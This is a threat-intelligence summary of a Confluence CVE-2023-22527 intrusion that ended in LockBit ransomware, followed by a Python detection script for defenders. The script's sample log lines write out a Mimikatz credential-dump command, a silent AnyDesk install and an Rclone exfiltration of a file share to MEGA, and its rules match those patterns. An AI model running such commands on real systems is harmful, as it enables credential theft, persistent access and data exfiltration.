Confluence Exploit Leads to LockBit Ransomware

NetmanageIT OpenCTI - opencti.netmanageit.com

SUMMARY :

An intrusion began with the exploitation of CVE-2023-22527 on an internet-exposed Windows Confluence server and ended with LockBit ransomware deployed across the environment. The threat actor used a mix of tooling including Mimikatz for credential theft, Metasploit, and AnyDesk for persistent remote access. They moved laterally over RDP and deployed the ransomware by several routes: copying the payload to hosts over SMB and pushing it automatically with PDQ Deploy. Sensitive data was exfiltrated with Rclone to MEGA.io cloud storage. The Time to Ransom (TTR), from initial exploitation to ransomware execution, was approximately two hours, which leaves defenders very little window to detect and contain the intrusion.
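Each stage in that chain leaves a distinct host-level footprint, so the summary maps onto a small set of detections. The script below is an added example written for this page, not code from the report or from NetmanageIT: it runs one rule per stage (Confluence process spawning a shell, Mimikatz, RDP logon type 10, unattended AnyDesk install, Rclone to a MEGA remote, a child of the PDQ Deploy runner) over constructed log lines and then measures the gap between the first and last stage, which is how a Time to Ransom figure is derived. The key=value log format, the hostnames, the Confluence parent process names, the Rclone remote name and the payload filename are all assumptions made for the example.

```python
import re
from datetime import datetime

# Constructed sample log lines (illustrative, NOT from the reported intrusion).
# The key=value layout, hostnames and filenames are assumptions; the lines stand
# in for Sysmon process-creation events and Windows 4624 logon events.
SAMPLE_LOGS = [
    '2024-01-01T10:00:00Z host=CONF01 event=process user="NT AUTHORITY\\NETWORK SERVICE" parent=tomcat9.exe image=cmd.exe cmdline="cmd.exe /c whoami"',
    '2024-01-01T10:05:00Z host=CONF01 event=process user="NT AUTHORITY\\NETWORK SERVICE" parent=cmd.exe image=mimikatz.exe cmdline="mimikatz.exe privilege::debug sekurlsa::logonpasswords exit"',
    '2024-01-01T10:20:00Z host=DC01 event=logon type=10 user="CORP\\admin" src=10.0.0.5',
    '2024-01-01T10:30:00Z host=DC01 event=process user="CORP\\admin" parent=explorer.exe image=AnyDesk.exe cmdline="AnyDesk.exe --install C:\\ProgramData\\AnyDesk --start-with-win --silent"',
    '2024-01-01T11:00:00Z host=DC01 event=process user="CORP\\admin" parent=cmd.exe image=rclone.exe cmdline="rclone.exe copy \\\\FS01\\finance mega:backup -q --ignore-existing --transfers 16"',
    '2024-01-01T11:50:00Z host=WS07 event=process user="NT AUTHORITY\\SYSTEM" parent=PDQDeployRunner-1.exe image=payload.exe cmdline="payload.exe"',
    '2024-01-01T09:55:00Z host=WS02 event=process user="CORP\\bob" parent=explorer.exe image=OUTLOOK.EXE cmdline="OUTLOOK.EXE"',
]

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<rest>.*)$")
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse(line):
    """Turn one 'ts key=value key="quoted value"' line into a dict, or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ev = {"ts": m.group("ts")}
    for key, quoted, bare in KV_RE.findall(m.group("rest")):
        ev[key] = quoted if quoted else bare
    return ev


def _lower(ev, key):
    return ev.get(key, "").lower()


# One rule per stage of the reported chain. Parent names for the Confluence
# service process are an assumption; adjust them to the local install.
RULES = {
    "confluence_spawns_shell": lambda ev: ev.get("event") == "process"
        and _lower(ev, "parent") in {"tomcat9.exe", "tomcat9w.exe", "java.exe"}
        and _lower(ev, "image") in {"cmd.exe", "powershell.exe"},
    "mimikatz": lambda ev: ev.get("event") == "process"
        and ("mimikatz" in _lower(ev, "image") or "sekurlsa::" in _lower(ev, "cmdline")),
    # Logon type 10 = RemoteInteractive, i.e. an RDP session.
    "rdp_logon": lambda ev: ev.get("event") == "logon" and ev.get("type") == "10",
    "anydesk_silent_install": lambda ev: ev.get("event") == "process"
        and "anydesk" in _lower(ev, "image") and "--install" in _lower(ev, "cmdline"),
    # Rclone remote names are user-chosen; matching "mega…:" is a heuristic.
    "rclone_to_mega": lambda ev: ev.get("event") == "process"
        and "rclone" in _lower(ev, "image")
        and re.search(r"\bmega\w*:", _lower(ev, "cmdline")) is not None,
    "pdq_deploy_child": lambda ev: ev.get("event") == "process"
        and _lower(ev, "parent").startswith("pdqdeployrunner"),
}


def scan(lines):
    """Return rule hits (rule, ts, host, user) in timestamp order."""
    hits = []
    for line in lines:
        ev = parse(line)
        if not ev:
            continue
        for name, rule in RULES.items():
            if rule(ev):
                hits.append({"rule": name, "ts": ev["ts"],
                             "host": ev.get("host"), "user": ev.get("user")})
    return sorted(hits, key=lambda h: h["ts"])


def minutes_between(hits, first_rule, last_rule):
    """Minutes from the earliest first_rule hit to the earliest last_rule hit."""
    fmt = "%Y-%m-%dT%H:%M:%SZ"
    first = min((h["ts"] for h in hits if h["rule"] == first_rule), default=None)
    last = min((h["ts"] for h in hits if h["rule"] == last_rule), default=None)
    if first is None or last is None:
        return None
    return (datetime.strptime(last, fmt) - datetime.strptime(first, fmt)).total_seconds() / 60


if __name__ == "__main__":
    found = scan(SAMPLE_LOGS)
    for h in found:
        print(f'{h["ts"]} {h["host"]:<7} {h["rule"]}')
    print("minutes from initial shell to PDQ deployment:",
          minutes_between(found, "confluence_spawns_shell", "pdq_deploy_child"))
```

Run against the constructed lines, the script flags six events and none for the benign Outlook launch, and reports 110 minutes between the first shell spawned by the Confluence process and the first payload launched by the PDQ Deploy runner. In a real environment the same rules would be expressed as Sigma or EDR queries; the point here is that every stage named in the summary is individually detectable, and the short TTR means the earliest stages (the Confluence child process and Mimikatz) are the ones worth alerting on.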

OPENCTI LABELS :

ransomware,rdp,lateral movement,lockbit,credential theft,confluence,cve-2023-22527,exfiltration



